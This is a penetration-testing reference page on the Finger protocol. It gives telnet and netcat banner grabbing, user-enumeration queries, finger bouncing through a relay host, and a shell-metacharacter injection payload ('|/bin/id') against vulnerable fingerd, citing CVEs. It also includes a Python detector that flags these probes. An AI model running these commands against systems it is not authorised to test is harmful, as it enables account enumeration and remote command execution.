Finger (User Information Protocol)
At a Glance
Default Port: 79
The Finger User Information Protocol (RFC 1288) is a simple protocol that provides an interface to a remote user information program (RUIP). [1]
Banner Grabbing
Telnet
telnet 10.0.0.3 79
Netcat
echo "root" | nc -n 10.0.0.3 79
Enumeration
Tools
Fast Enum
for q in 'root' 'admin' 'user' '0' "'a b c d e f g h'" '|/bin/id';do echo "FINGER: $q"; finger "$q@10.0.0.3"; echo -e "\n";done
Finger [2]
List logged-in users.
finger @10.0.0.3
Finger a specific user.
finger -l root@10.0.0.3
Enumerate users containing user.
finger -l user@10.0.0.3
Note: Try other words such as admin, account or project.
Parameters
-l: Multi-line format. Displays all the information.
Finger Zero [3]
fingerd may respond to finger 0@<host> with information on some user accounts.
finger 0@10.0.0.3
Finger 'a b c d e f g h' [4]
fingerd may respond to 'a b c d e f g h'@<host> with information on all accounts.
finger 'a b c d e f g h'@10.0.0.3
Finger Bouncing [5]
finger can be used to relay a request to a different host as if it were sent from that machine.
finger @10.0.0.3@10.10.10.4
finger root@10.0.0.3@10.10.10.4
Command Execution [6]
fingerd allows remote command execution through shell metacharacters.
finger "|/bin/id@10.0.0.3"
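Seen from the server side, each of the queries above (zero, multi-word, bouncing, metacharacters) arrives on TCP/79 as a single request line, so it can be recognised in a capture or in front of fingerd. The Python below is an added example, not part of the original page; the tag names, the SHELL_META set and the sample request lines are assumptions constructed for illustration.

```python
import re

# Assumption: characters treated as shell metacharacters for alerting purposes.
SHELL_META = set("|;&`$<>(){}\\")
# Tags that correspond to the probes described on this page.
SUSPICIOUS = {"forwarding", "shell-metachar", "zero-query", "multi-token"}

def classify(raw: bytes) -> list[str]:
    """Tag one finger request line as received by the server on TCP/79."""
    line = raw.decode("latin-1").rstrip("\r\n")
    tags = set()
    if any(c in SHELL_META for c in line):
        tags.add("shell-metachar")
    # RFC 1288: an optional "/W" token asks for verbose output (finger -l).
    m = re.match(r"/W(?: +|$)", line)
    if m:
        tags.add("verbose")
        line = line[m.end():]
    # Anything after "@" asks the server to relay the query ({Q2} in the RFC).
    user, at, _hosts = line.partition("@")
    if at:
        tags.add("forwarding")
    if user == "":
        tags.add("user-list")      # empty user part: list logged-in users
    elif user.strip() == "0":
        tags.add("zero-query")
    elif len(user.split()) > 1:
        tags.add("multi-token")    # e.g. the 'a b c d e f g h' query
    return sorted(tags)

def is_suspicious(raw: bytes) -> bool:
    """True when the request matches one of the probe patterns."""
    return bool(SUSPICIOUS.intersection(classify(raw)))

# Constructed request lines: what the contacted server receives for the
# commands shown on this page (for bouncing, the last host in the chain).
SAMPLES = [b"\r\n", b"/W root\r\n", b"0\r\n", b"a b c d e f g h\r\n",
           b"@10.0.0.3\r\n", b"root@10.0.0.3\r\n", b"|/bin/id\r\n"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:28} {classify(s)} suspicious={is_suspicious(s)}")
```

Plain user lookups and the empty list query are tagged but not flagged, so the output separates routine use from the probe patterns.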
Finger Exploits Search
Refer to Exploits Search
[1] “RFC 1288 - The Finger User Information Protocol.” IETF Tools, https://tools.ietf.org/html/rfc1288.
[2] “Finger(1): User Info Lookup Program.” Linux Documentation, https://linux.die.net/man/1/finger.
[3] “CVE - CVE-1999-0197.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0197.
[4] “CVE - CVE-2001-1503.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1503.
[5] “Solaris 2.7 Allows Finger Bouncing.” SecuriTeam, 15 Jan. 1999, https://securiteam.com/exploits/2BUQ2RFQ0I/.
[6] “CVE - CVE-1999-0152.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0152.